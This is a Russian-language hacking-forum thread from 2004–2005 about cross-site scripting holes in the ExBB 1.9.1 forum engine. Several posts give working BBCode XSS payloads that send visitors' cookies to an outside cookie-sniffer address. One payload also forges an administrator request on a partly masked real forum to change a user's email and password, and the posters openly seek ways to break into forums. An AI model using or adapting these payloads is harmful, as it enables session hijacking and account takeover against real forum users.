Xss в exbb 1.9.1

Discussion in 'Уязвимости' started by zFailure, 19 Oct 2004.

  1. zFailure

    zFailure Elder - Старейшина

    Joined:
    6 Jun 2004
    Messages:
    163
    Likes Received:
    24
    Reputations:
    24
    Адрес сниффера: http://antichat.ru/cgi-bin/s.jpg

    XSS в каждом теге
    </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">[color='z=]'style='background:url(javascript:document.images[0].src="http://localhost/1.php?"+document.cookie)'[/color]
    [size='z="]"style='background:url(javascript:document.images[0].src="http://localhost/1.php?"+document.cookie)'[/size]
    'z="style='background:url(javascrip.../g,String.fromCharCode(47))+document.cookie)'
    http://video.antichat.ru/videos/zfailure/exbb_191.rar
     
  2. OwrLam

    OwrLam Наглый...

    Joined:
    14 May 2004
    Messages:
    21
    Likes Received:
    2
    Reputations:
    0
    Всё хорошо, но это не то. Мне нужна возможность залития файлов на сервер через админку или другой любой способ. А XBB стандартно - &quot;&gt;
     
  3. zFailure

    zFailure Elder - Старейшина

    Joined:
    6 Jun 2004
    Messages:
    163
    Likes Received:
    24
    Reputations:
    24
    ну извени!
    там на столько бедная админка, что хрен там было! &nbsp;[​IMG]
     
  4. ViPN

    ViPN New Member

    Joined:
    6 Jan 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    zFailure
    Не мог бы сказать этот баг уже прикрыли?
    а то отсылаю вот этот код
    Code:
    [size='z="]"style='background:url(javascript:document.images[0].src="http://antichat.ru/cgi-bin/s.jpg?video___"+document.cookie)'[/size]
    [size='z="]"style='background:url(javascript:document.images[0].src="http://forum.k*****h.com/setmembers.php?action=edit_user&checkaction=yes&userid=45&membertitle=&[email protected]&newname=Коля&password=111111&homepage=&aolname=&icqnumber=&location=&interests=&signature=&numberofposts=0&avatar=noavatar.gif&membercode=ad&submit=%CE%F2%EF%F0%E0%E2%E8%F2%FC")'[/size]
    а там тишина и пустота
     
    #4 ViPN, 6 Jan 2005
    Last edited by a moderator: 6 Jan 2005
  5. ViPN

    ViPN New Member

    Joined:
    6 Jan 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    кто нить может ответить на вопрос есть лиш ещё какие нить баги или дырки или хоть какие нить ещё зацепки на взлом форума Powered by ExBB 1.9.1 или все он стал самым надежным и без бажным форумоммМММ!!!!!
     
  6. Егорыч+++

    Staff Member

    Joined:
    27 May 2002
    Messages:
    1,373
    Likes Received:
    895
    Reputations:
    20
    У нас видео есть про этот форум
     
    #6 Егорыч+++, 31 Jan 2005
    Last edited: 3 Feb 2005
  7. Menvix

    Menvix Elder - Старейшина

    Joined:
    3 Feb 2005
    Messages:
    33
    Likes Received:
    3
    Reputations:
    0
    Кликнул по ссылке
     
  8. Kihamo

    Kihamo New Member

    Joined:
    14 Jan 2005
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Кста во я тут кое-что заметил по поводу ExBB 1.9.1. В просмотре топа мона добавлять имя юзера кликнув по линку
    Code:
    <a href="javascript:pasteN<a href="javascript:pasteN('UserName')"><b>UserName</b></a>
    , мона зарегистрировать например такой ник
    Code:
    ');alert(document.cookie+'
    и при клике будет алерт с куками, несмотря на то, что ' заменяются на & #39; дык вот чуствую это как-то мона обыграть, но пока не знаю как :(
     
    #8 Kihamo, 19 Feb 2005
    Last edited: 19 Feb 2005
  9. smag

    smag Elder - Старейшина

    Joined:
    24 Mar 2005
    Messages:
    15
    Likes Received:
    2
    Reputations:
    0
    дайте пожайлуста видео!!!! чем больше тем лутше!!!